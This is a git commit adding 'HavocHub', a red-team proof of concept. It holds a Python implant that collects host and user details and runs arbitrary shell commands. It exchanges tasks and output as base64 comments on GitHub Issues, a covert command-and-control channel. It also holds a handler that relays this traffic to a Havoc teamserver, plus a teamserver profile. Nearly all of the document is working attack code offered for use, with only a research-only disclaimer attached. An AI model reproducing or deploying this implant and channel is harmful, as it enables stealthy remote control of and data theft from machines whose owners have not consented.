initial commit

This commit is contained in:
Processus
2025-06-02 10:11:02 +02:00
parent ded100a3e0
commit 67636d3d42
18 changed files with 1116 additions and 2 deletions
+112 -2
View File
@@ -1,2 +1,112 @@
# HavocHub
PoC of Havoc agent communicating over GitHub : This project enables stealthy command-and-control operations by exchanging commands and results as base64-encoded comments in GitHub Issues
<p align="center">
<img src="assets/demo.png" alt="Havoc GitHub C2 Demo" width="600"/>
</p>
# HavocGitC2
**PoC of a Havoc agent communicating over GitHub**
This project demonstrates a Proof-of-Concept (PoC) for a Red Team post-exploitation agent and handler that uses **GitHub Issues and Comments** as its Command and Control (C2) channel. All command and data exchanges are obfuscated in base64 and masquerade as normal developer activity, enabling stealthy operations while blending in with legitimate GitHub traffic.
---
## How It Works
- The Python agent, executed on the target machine, creates a GitHub issue and posts base64-encoded comments.
- The handler (running server-side) fetches the latest issue and exchanges commands/results through comments, acting as a relay to Havocs API.
- Communication flows entirely through the GitHub API, providing a covert and resilient C2 channel.
- The Havoc operator can issue commands as usual; results are transferred back and forth via GitHub.
---
## How To Use
### 1. Create a GitHub Account
Sign up for a GitHub account at [https://github.com/](https://github.com/).
### 2. Access Your GitHub Tokens
Navigate to [https://github.com/settings/tokens](https://github.com/settings/tokens).
### 3. Create a Classic Personal Access Token
- Click “Generate new token (classic)”.
- Give it a descriptive name and set **repo** access permissions.
- Copy the token and update these values in both `agent.py` and `handler.py`:
```python
# --- CONFIG ---
GITHUB_TOKEN = "ghp_XXXXXXXXXXXXXXXXXXXXXXXXXXXXX"
REPO_OWNER = "YOUR_USERNAME"
REPO_NAME = "your_repository"
ISSUE_LABEL = "HAVOCHUB"
```
### 4. Configure Havoc API Service and External Endpoint
Update your Havoc profile (e.g., havoc.yaotl) as follows:
```yaotl
Listeners {
Http {
Name = "http"
Hosts = ["YOUR PUBLIC IP ADDRESS"]
HostBind = "0.0.0.0"
HostRotation = "round-robin"
PortBind = 80
PortConn = 80
Secure = false
UserAgent = "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36"
}
External {
Name = "your_external_c2_endpoint"
Endpoint = "your_external_c2_endpoint"
}
}
Service {
Endpoint = "YOUR_SERVICE_ENDPOINT"
Password = "YOUR_SERVICE_PASSWORD"
}
```
### 5. Update the Handler Configuration
Set the API and endpoints accordingly in your handler.py:
```yaotl
HAVOC_SERVICE_ENDPOINT = "wss://127.0.0.1:443/YOUR_SERVICE_ENDPOINT"
HAVOC_SERVICE_PASSWORD = "YOUR_SERVICE_PASSWORD"
EXTERNAL_C2_ENDPOINT = "http://127.0.0.1/your_external_c2_endpoint"
```
## Social Networks
- [YouTube](https://www.youtube.com/c/processusthief)
- [Twitter](https://x.com/ProcessusT)
- [LinkedIn](https://www.linkedin.com/in/christopher-thiefin/)
---
## Video Demo
[![Watch the Demo](assets/demo.png)](assets/demo.mp4)
## Limits
This project relies on communication through the GitHub API, which enforces several rate limits.
- Exceeding these limits may result in delayed agent communication or API errors.
- For detailed explanations, refer to the [GitHub REST API Rate Limits documentation](https://docs.github.com/fr/rest/using-the-rest-api/rate-limits-for-the-rest-api?apiVersion=2022-11-28#about-secondary-rate-limits).
**Note:** The agent and handler are designed for research, educational usage, and laboratory environments.
Do not use this project for unlawful activities or abuse public infrastructure.
---
## TODO
- Update `lastCallback`:
Add a function in `havoc/agent.py` to update `AgentInfo.LastCallIn` with every communication or callback.
Feel free to contribute with pull requests or suggestions!
+184
View File
@@ -0,0 +1,184 @@
import requests
import json
import socket
import time
import os
import sys
import random
import string
import platform
import base64
import subprocess
import traceback
# --- CONFIG ---
GITHUB_TOKEN = "ghp_XXXXXXXXXXXXXXXXXXXXXXXXXXXXX"
REPO_OWNER = "YOUR_USERNAME"
REPO_NAME = "your_repository"
ISSUE_LABEL = "HAVOCHUB"
HEADERS = {
"Authorization": f"token {GITHUB_TOKEN}",
"Accept": "application/vnd.github.v3+json"
}
magic = (0x41414141).to_bytes(4, 'big')
letters = string.ascii_lowercase
agentid = str(''.join(random.choice(letters) for i in range(4))).encode('utf-8')
sleeptime = 5
# --- GITHUB FUNCTIONS ---
def create_issue():
url = f"https://api.github.com/repos/{REPO_OWNER}/{REPO_NAME}/issues"
title = f"Havoc-Agent-Session-{random.randint(10000,99999)}"
body = "Automated agent session for C2 exfiltration."
data = {"title": title, "body": body, "labels": [ISSUE_LABEL]}
r = requests.post(url, headers=HEADERS, json=data)
if r.status_code == 201:
issue = r.json()
issue_number = issue["number"]
issue_title = issue["title"]
print(f"[+] New issue created : {issue_title} - ({issue_number})")
return issue_number, issue_title
else:
err = r.json()
print(err)
traceback.print_exc()
raise Exception("Impossible de créer une nouvelle issue Github.")
def post_comment(issue_number, payload_b64):
url = f"https://api.github.com/repos/{REPO_OWNER}/{REPO_NAME}/issues/{issue_number}/comments"
data = {'body': payload_b64}
r = requests.post(url, headers=HEADERS, json=data)
if r.status_code == 201:
comment = r.json()
comment_id = comment.get('id')
return comment_id
else:
return False
def get_last_command(issue_number, seen_comment_ids):
url = f"https://api.github.com/repos/{REPO_OWNER}/{REPO_NAME}/issues/{issue_number}/comments"
r = requests.get(url, headers=HEADERS)
comments = r.json()
for comment in comments:
comment_id = comment['id']
if comment_id not in seen_comment_ids:
text_b64 = comment.get('body','').strip()
if text_b64 and len(text_b64)>1:
return comment_id, text_b64
return None, None
# --- HAVOC FUNCTIONS ---
def checkin(issue_number):
print("[+] Checking in for taskings")
requestdict = {"task":"gettask","data":""}
requestblob = json.dumps(requestdict)
size = len(requestblob) + 12
size_bytes = size.to_bytes(4, 'big')
agentheader = size_bytes + magic + agentid
payload = agentheader+requestblob.encode("latin-1", errors="replace")
payload_b64 = base64.b64encode(payload).decode("latin-1", errors="replace")
comment_id = post_comment(issue_number, payload_b64)
return comment_id
def register(issue_number):
hostname = socket.gethostname()
registerdict = {
"AgentID": str(agentid),
"Hostname": hostname,
"Username": os.environ.get("USERNAME", "unknown"),
"Domain": os.environ.get("USERDOMAIN", ""),
"InternalIP": socket.gethostbyname(hostname),
"Process Path": os.getcwd(),
"Process ID": str(os.getpid()),
"Process Parent ID": "0",
"Process Arch": "x64",
"Process Elevated": 0,
"OS Build": "qsddq",
"Sleep": 1,
"Process Name": os.path.basename(sys.executable),
"OS Version": "qsdqsd"
}
registerblob = json.dumps(registerdict)
requestdict = {"task":"register","data":registerblob}
requestblob = json.dumps(requestdict)
size = len(requestblob) + 12
size_bytes = size.to_bytes(4, 'big')
agentheader = size_bytes + magic + agentid
payload = agentheader+requestblob.encode("latin-1", errors="replace")
payload_b64 = base64.b64encode(payload).decode("latin-1", errors="replace")
comment_id = post_comment(issue_number, payload_b64)
return comment_id
def runcommand(command):
command = command.strip("\x00")
if command == "goodbye":
sys.exit(2)
print(f"[+] Running command : {command}")
p = subprocess.Popen(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
output, _ = p.communicate()
output = output.decode("latin-1", errors="replace")
output = output.strip('\n')
output = output.strip('\r')
print(f"[+] Output : {output}")
return str(output)
def main():
global agentid
global magic
global sleeptime
agentheader = magic + agentid
registered = ""
seen_comment_ids = set()
issue_number, issue_title = create_issue()
#register the agent
print("[?] trying to register the agent")
register_comment_id = register(issue_number)
if register_comment_id > 0:
print("[+] Agent registered !\n")
seen_comment_ids.add(register_comment_id)
else:
sys.exit()
while True:
# Checkin : post un commentaire de demande de tâche
checkin_comment_id = checkin(issue_number)
if checkin_comment_id:
seen_comment_ids.add(checkin_comment_id)
# Récupère dernière commande non traitée postée sur l'issue
comment_id, command_b64 = get_last_command(issue_number, seen_comment_ids)
if comment_id is not None:
print(f"[C2] Command received in comment ID {comment_id}")
seen_comment_ids.add(comment_id)
try:
command_decoded = base64.b64decode(command_b64).decode("latin-1", errors="replace")
output = runcommand(command_decoded)
output_b64 = base64.b64encode(output.encode("latin-1", errors="replace")).decode("latin-1", errors="replace")
requestdict = {"task":"result","data":output}
requestblob = json.dumps(requestdict)
size = len(requestblob) + 12
size_bytes = size.to_bytes(4, 'big')
agentheader = size_bytes + magic + agentid
payload = agentheader+requestblob.encode("latin-1", errors="replace")
payload_b64 = base64.b64encode(payload).decode("latin-1", errors="replace")
result_comment_id = post_comment(issue_number, payload_b64)
seen_comment_ids.add(result_comment_id)
except Exception as e:
print(f"[!] Command error: {e}")
time.sleep(sleeptime)
time.sleep(sleeptime)
if __name__ == "__main__":
main()
BIN
View File
Binary file not shown.
BIN
View File
Binary file not shown.

After

Width:  |  Height:  |  Size: 225 KiB

+42
View File
@@ -0,0 +1,42 @@
Teamserver {
Host = "0.0.0.0"
Port = 443
Build {
Compiler64 = "data/x86_64-w64-mingw32-cross/bin/x86_64-w64-mingw32-gcc"
Compiler86 = "data/i686-w64-mingw32-cross/bin/i686-w64-mingw32-gcc"
Nasm = "/usr/bin/nasm"
}
}
Operators {
user "proc" {
Password = "mdp2PR0C"
}
}
Listeners {
Http {
Name = "http"
Hosts = ["YOUR PUBLIC IP ADDRESS"]
HostBind = "0.0.0.0"
HostRotation = "round-robin"
PortBind = 80
PortConn = 80
Secure = false
UserAgent = "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36"
}
External {
Name = "kikikiiiii"
Endpoint = "kikikiiiii"
}
}
Service {
Endpoint = "owa"
Password = "NotifyEmailSync"
}
Demon {
Sleep = 2
Jitter = 15
Injection {
Spawn64 = "C:\\Windows\\System32\\WerFault.exe"
Spawn32 = "C:\\Windows\\SysWOW64\\WerFault.exe"
}
}
+252
View File
@@ -0,0 +1,252 @@
from base64 import b64decode
import requests
import time
import os
import sys
import base64
import json
from havoc.service import HavocService
from havoc.externalc2 import ExternalC2
from havoc.agent import *
import os
# --- CONFIG ---
GITHUB_TOKEN = "ghp_XXXXXXXXXXXXXXXXXXXXXXXXXXXXX"
REPO_OWNER = "YOUR_USERNAME"
REPO_NAME = "your_repository"
ISSUE_LABEL = "HAVOCHUB"
HEADERS = {
"Authorization": f"token {GITHUB_TOKEN}",
"Accept": "application/vnd.github.v3+json"
}
HAVOC_SERVICE_ENDPOINT = "wss://127.0.0.1:443/YOUR_SERVICE_ENDPOINT"
HAVOC_SERVICE_PASSWORD = "YOUR_SERVICE_PASSWORD"
EXTERNAL_C2_ENDPOINT = "http://127.0.0.1/your_external_c2_endpoint"
sleeptime = 1
issue_number = 0
seen_comment_ids = set()
COMMAND_REGISTER = 0x100
COMMAND_GET_JOB = 0x101
COMMAND_NO_JOB = 0x102
COMMAND_SHELL = 0x152
COMMAND_EXIT = 0x155
COMMAND_OUTPUT = 0x200
# ====================
# ===== Commands =====
# ====================
class CommandShell(Command):
CommandId = COMMAND_SHELL
Name = "shell"
Description = "executes commands"
Help = ""
NeedAdmin = False
Params = [
CommandParam(
name="commands",
is_file_path=False,
is_optional=False
)
]
Mitr = []
def job_generate( self, arguments: dict ) -> bytes:
Task = Packer()
Task.add_data(arguments[ 'commands' ])
return Task.buffer
class CommandExit( Command ):
CommandId = COMMAND_EXIT
Name = "exit"
Description = "tells the python agent to exit"
Help = ""
NeedAdmin = False
Mitr = []
Params = []
def job_generate( self, arguments: dict ) -> bytes:
Task = Packer()
Task.add_data("goodbye")
return Task.buffer
# =======================
# ===== Agent Class =====
# =======================
class python(AgentType):
Name = "Havoc-Hub"
Author = "@ProcessusT"
Version = "0.1"
Description = f"""python 3rd party agent for Havoc"""
MagicValue = 0x41414141
Arch = [
"x64",
"x86",
]
Formats = [
{
"Name": "GitHub comments",
"Extension": "unknown",
},
]
BuildingConfig = {
"Sleep": "10"
}
Commands = [
CommandShell(),
CommandExit(),
]
def response( self, response: dict ) -> bytes:
try:
agent_header = response[ "AgentHeader" ]
print("[+] Receieved request from agent")
agent_header = response[ "AgentHeader" ]
agent_response = b64decode( response[ "Response" ] ) # the teamserver base64 encodes the request.
json_data = b64decode( agent_response.decode("latin-1", errors="replace"))
agentjson = json.loads(json_data)
print(f"[+] Received request : {agentjson}")
print(f"[+] Agent headers : {agent_header}")
if agentjson["task"] == "register":
#print(json.dumps(agentjson,indent=4))
print("[+] Registered agent")
self.register( agent_header, json.loads(agentjson["data"]) )
AgentID = response[ "AgentHeader" ]["AgentID"]
self.console_message( AgentID, "Good", f"Python agent {AgentID} registered", "" )
return b'registered'
elif agentjson["task"] == "gettask":
AgentID = response[ "Agent" ][ "NameID" ]
self.console_message( AgentID, "Good", "Host checkin", "" )
print("[+] Agent requested taskings")
Tasks = self.get_task_queue( response[ "Agent" ] )
if len(str(Tasks)) > 1 :
task = Tasks[4:].decode('latin-1').strip('\x00').strip()
print(f"[+] Task retrieved : {task}")
global issue_number
payload_b64 = base64.b64encode(task.encode("latin-1", errors="replace")).decode("latin-1", errors="replace")
print("[+] Sending task to agent")
comment_id = post_comment(issue_number, payload_b64)
global seen_comment_ids
seen_comment_ids.add(comment_id)
print("[+] Task sent !")
else:
print("[+] No tasks for the moment.")
Tasks = b''
elif agentjson["task"] == "result":
print("[+] Command result received !")
print(agentjson)
AgentID = response[ "Agent" ][ "NameID" ]
self.console_message( AgentID, "Good", "Command result received :", str(agentjson["data"]) )
Tasks = b''
return Tasks
except:
pass
# ===============================
# ====== GitHub functions =======
# ===============================
def get_last_issue_number():
url = f"https://api.github.com/repos/{REPO_OWNER}/{REPO_NAME}/issues"
params = {
"state": "open",
"sort": "created",
"direction": "desc",
"per_page": 1
}
r = requests.get(url, headers=HEADERS, params=params)
if r.status_code == 200 and len(r.json()) > 0:
latest_issue = r.json()[0]
return latest_issue["number"], latest_issue["title"]
else:
raise Exception("Impossible de récupérer la dernière issue Github.")
def post_comment(issue_number, payload_b64):
url = f"https://api.github.com/repos/{REPO_OWNER}/{REPO_NAME}/issues/{issue_number}/comments"
data = {'body': payload_b64}
r = requests.post(url, headers=HEADERS, json=data)
if r.status_code == 201:
comment = r.json()
comment_id = comment.get('id')
return comment_id
else:
return False
def get_last_command(issue_number, seen_comment_ids):
url = f"https://api.github.com/repos/{REPO_OWNER}/{REPO_NAME}/issues/{issue_number}/comments"
r = requests.get(url, headers=HEADERS)
comments = r.json()
for comment in comments:
comment_id = comment['id']
if comment_id not in seen_comment_ids:
text_b64 = comment.get('body','').strip()
if text_b64 and len(text_b64)>20:
return comment_id, text_b64
return None, None
def main():
# Handling service API
Havoc_python = python()
print( "[+] Connect to Havoc service api..." )
havoc_service = HavocService(
endpoint=HAVOC_SERVICE_ENDPOINT,
password=HAVOC_SERVICE_PASSWORD
)
print( "[+] Register python to Havoc..." )
havoc_service.register_agent(Havoc_python)
# Connecting to external C2 endpoint
print( "[+] Connect to Havoc endpoint..." )
externalc2 = ExternalC2( EXTERNAL_C2_ENDPOINT )
print( f"[+] ExternalC2 = {externalc2}")
# Retrieving last issue
global issue_number
issue_number, issue_title = get_last_issue_number()
print( f"[+] Last issue number is {issue_number}" )
# Retrieving checkin and command results
global seen_comment_ids
while True:
try:
comment_id, comment_b64 = get_last_command(issue_number, seen_comment_ids)
seen_comment_ids.add(comment_id)
comment_decoded = base64.b64decode(comment_b64)
print( f"[+] Last command is {str(comment_decoded)}")
size = len(str(comment_decoded[12:])) + 12 # le JSON + 4 (magic) + 4 (agentid) + 4 (size)
size_bytes = size.to_bytes(4, 'big')
magic = comment_decoded[4:8]
agentid = comment_decoded[8:12]
agentheader = size_bytes + magic + agentid
data_b64 = base64.b64encode(comment_decoded[12:])
transmission = agentheader + data_b64
print( f"[+] Transmission to C2 : {str(transmission)}")
response = externalc2.transmit( transmission )
time.sleep(sleeptime)
except Exception as e:
print(f"[!] Error : {e}")
time.sleep(sleeptime)
pass
return
if __name__ == '__main__':
try:
main()
except:
pass
View File
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
+325
View File
@@ -0,0 +1,325 @@
from asyncio import Task
import base64
import json
import struct
import uuid
import random
import string
from struct import pack, calcsize
from black import out
from itsdangerous import base64_encode
def build_request(head_type, body: dict) -> dict:
return {
"Head": {
"Type": head_type
},
"Body": body
}
class Packer:
buffer: bytes = b''
length: int = 0
def get_buffer( self ) -> bytes:
return pack( "<L", self.length ) + self.buffer
def add_int( self, data ) -> None:
self.buffer += pack( "<i", data )
self.length += 4
return
def add_data( self, data: str ) -> None:
if isinstance( data, str ):
data = data.encode( "utf-8" )
fmt = "<L{}s".format( len( data ) + 1 )
self.buffer += pack( fmt, len( data ) + 1, data )
self.length += calcsize( fmt )
def dump( self ) -> None:
print( f"[*] Buffer: [{ self.length }] [{ self.get_buffer() }]" )
return
class Parser:
buffer: bytes = b''
length: int = 0
def __init__( self, buffer, length ):
self.buffer = buffer
self.length = length
return
def parse_int( self ) -> int:
val = struct.unpack( ">i", self.buffer[ :4 ] )
self.buffer = self.buffer[ 4: ]
return val[ 0 ]
def parse_bytes( self ) -> bytes:
length = self.parse_int()
buf = self.buffer[ :length ]
self.buffer = self.buffer[ length: ]
return buf
def parse_pad( self, length: int ) -> bytes:
buf = self.buffer[ :length ]
self.buffer = self.buffer[ length: ]
return buf
def parse_str( self ) -> str:
return self.parse_bytes().decode( 'utf-8' )
class CommandParam:
Name: str
IsFilePath: bool
IsOptional: bool
def __init__( self, name: str, is_file_path: bool, is_optional: bool ):
self.Name = name
self.IsFilePath = is_file_path
self.IsOptional = is_optional
return
class Command:
Name: str
Description: str
Help: str
NeedAdmin: bool
Mitr: list[ str ]
Params: list[ CommandParam ]
CommandId: int
def job_generate( self, arguments: dict ) -> bytes:
pass
def get_dict( self ) -> dict:
return {
"Name": self.Name,
"Author": self.Author, # todo: remove this
"Description": self.Description,
"Help": self.Help,
"NeedAdmin": self.NeedAdmin,
"Mitr": self.Mitr,
}
class AgentType:
Name: str
Author: str
Version: str
MagicValue: int
Description: str
Arch = list[ str ]
Formats = list[ dict ]
Commands: list[ Command ]
BuildingConfig = dict
_Service_instance = None
_current_data: dict = {}
def task_prepare( self, arguments: dict ) -> bytes:
for cmd in self.Commands:
if arguments[ "Command" ] == cmd.Name:
return cmd.job_generate( arguments )
def generate( self, config: dict ) -> None:
pass
def download_file( self, agent_id: str, file_name: str, size: int, content: str ) -> None:
ContentB64 = base64.b64encode( content.encode( 'utf-8' ) ).decode( 'utf-8' )
self._Service_instance.Socket.send(
json.dumps(
{
"Head": {
"Type": "Agent"
},
"Body": {
"Type" : "AgentOutput",
"AgentID" : agent_id,
"Callback" : {
"MiscType" : "download",
"FileName" : file_name,
"Size" : size,
"Content" : ContentB64
}
}
}
)
)
return
def console_message( self, agent_id: str, type: str, message: str, output: str ) -> None:
self._Service_instance.Socket.send(
json.dumps(
{
"Head": {
"Type": "Agent"
},
"Body": {
"Type" : "AgentOutput",
"AgentID" : agent_id,
"Callback" : {
"Type" : type,
"Message": message,
"Output" : output
}
}
}
)
)
return
def get_task_queue( self, AgentInfo: dict ) -> bytes:
RandID : str = ''.join(random.choice(string.ascii_uppercase + string.ascii_lowercase + string.digits) for _ in range(6))
Tasks : bytes = b''
self._Service_instance.Socket.send(
json.dumps(
{
"Head": {
"Type": "Agent"
},
"Body": {
"Type" : "AgentTask",
"Agent": AgentInfo,
"Task": "Get",
"RandID": RandID
}
}
)
)
while ( True ):
if RandID in self._current_data:
Tasks = self._current_data[ RandID ]
del self._current_data[ RandID ]
break
else:
continue
return Tasks
def register( self, agent_header: dict, register_info: dict ):
self._Service_instance.Socket.send(
json.dumps(
{
"Head": {
"Type": "Agent"
},
"Body": {
"Type": "AgentRegister",
"AgentHeader" : agent_header,
"RegisterInfo": register_info
}
}
)
)
return
def response( self, response: dict ) -> bytes:
pass
def builder_send_message(self, client_id: str, msg_type: str, message: str):
self._Service_instance.Socket.send(
json.dumps(
{
"Head": {
"Type": "Agent"
},
"Body": {
"ClientID": client_id,
"Type": "AgentBuild",
"Message": {
"Type": msg_type,
"Message": message
}
}
}
)
)
return
def builder_send_payload( self, client_id: str, filename: str, payload: bytes ):
self._Service_instance.Socket.send(
json.dumps(
build_request("Agent", {
"ClientID": client_id,
"Type": "AgentBuild",
"Message": {
"FileName": filename,
"Payload": base64.b64encode(payload).decode('utf-8')
}
})
)
)
return
def get_dict( self ) -> dict:
AgentCommands: list[ dict ] = []
for command in self.Commands:
command_params: list[dict] = []
for param in command.Params:
command_params.append( {
"Name": param.Name,
"IsFilePath": param.IsFilePath,
"IsOptional": param.IsOptional,
} )
AgentCommands.append( {
"Name": command.Name,
"Description": command.Description,
"Help": command.Help,
"NeedAdmin": command.NeedAdmin,
"Mitr": command.Mitr,
"Params": command_params
} )
return {
"Name": self.Name,
"MagicValue": hex( self.MagicValue ),
"BuildingConfig": self.BuildingConfig,
"Arch": self.Arch,
"Formats": self.Formats,
"Author": self.Author,
"Description": self.Description,
"Commands": AgentCommands
}
+29
View File
@@ -0,0 +1,29 @@
import base64
import requests
class ExternalC2:
Server: str = ''
def __init__( self, server ) -> None:
self.Server = server
return
def transmit( self, data ) -> bytes:
agent_response = b''
try:
# add user-agent headers to work with HavocHubO
headers = {
'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36'
}
response = requests.post( self.Server, data=data, headers=headers )
agent_response = base64.b64decode(response.text)
except Exception as e:
print( f"[-] Exception: {e}" )
return agent_response
+172
View File
@@ -0,0 +1,172 @@
import base64
from cgi import print_form
from havoc.agent import AgentType
from havoc.externalc2 import ExternalC2
from threading import Thread
import websocket
import json
import ssl
def build_request(head_type, body: dict) -> dict:
return {
"Head": {
"Type": head_type
},
"Body": body
}
class HavocService:
Socket: websocket.WebSocketApp = None
Teamserver: str = None
Endpoint: str = None
Password: str = None
Connected: bool = False
RegisteredAgent: AgentType = None
def __init__(self, endpoint: str, password: str):
if len(endpoint) > 0:
self.Endpoint = endpoint
else:
print("[!] endpoint not specified.")
if len(password) > 0:
self.Password = password
else:
print("[!] password not specified.")
self.Socket = websocket.WebSocketApp(
endpoint,
on_error=self.__ws_on_error,
on_message=self.__ws_on_message,
on_open=self.__ws_on_open
)
Thread( target=self.Socket.run_forever, kwargs={'sslopt': {'check_hostname': False, "cert_reqs": ssl.CERT_NONE}} ).start()
while True:
if self.Connected:
break
return
def __ws_on_error(self, wsapp, error):
print("[-] Websocket error:", error)
def __ws_on_open(self, socket):
print("[*] teamserver socket opened")
request = json.dumps(
build_request("Register", {
"Password": self.Password
}),
sort_keys=True
)
socket.send( request )
return
def __ws_on_message( self, ws, data ):
print( "[*] New Message" )
data = json.loads( data )
t = Thread(target=self.service_dispatch, args=(data,))
t.start()
# self.service_dispatch( json.loads( data ) )
return
def register_agent( self, agent_type: AgentType ):
# todo: check BuildConfig if everything is by rule
if self.RegisteredAgent is None:
print( "[*] register agent" )
self.RegisteredAgent = agent_type
self.RegisteredAgent._Service_instance = self
request = json.dumps(
build_request( "RegisterAgent", {
"Agent": agent_type.get_dict()
} ),
sort_keys=True
)
self.Socket.send( request )
else:
print( "[!] Agent already registered" )
return
def register_externalc2( self, externalc2: ExternalC2 ):
if self.ExternalC2 is None:
self.ExternalC2 = externalc2
self.ExternalC2._Service_instance = self
request = json.dumps(
build_request("RegisterAgent", {
"Agent": agent_type.get_dict()
}),
sort_keys=True
)
self.Socket.send(request)
else:
print( "[-] External C2 already registered" )
return
def service_dispatch( self, data: dict ):
match data[ "Head" ][ "Type" ]:
case "Register":
self.Connected = data[ "Body" ][ "Success" ]
return
case "RegisterAgent":
return
case "Agent":
match data[ "Body" ][ "Type" ]:
case "AgentTask":
if data[ "Body" ][ "Task" ] == "Get":
RandID = data[ "Body" ][ "RandID" ]
Tasks = base64.b64decode( data[ "Body" ][ "TasksQueue" ] )
print( f"Set TasksQueue to {RandID} = {Tasks.hex()}" )
self.RegisteredAgent._current_data[ RandID ] = Tasks
elif data[ "Body" ][ "Task" ] == "Add":
data[ "Body" ][ "Command" ] = base64.b64encode( self.RegisteredAgent.task_prepare( data[ 'Body' ][ 'Command' ] ) ).decode( 'utf-8' )
self.Socket.send( json.dumps( data ) )
case "AgentResponse":
agent_response = self.RegisteredAgent.response( data[ "Body" ] )
data[ "Body" ][ "Response" ] = base64.b64encode( agent_response ).decode( 'utf-8' )
self.Socket.send( json.dumps( data ) )
case "AgentBuild":
self.RegisteredAgent.generate( data[ "Body" ] )
return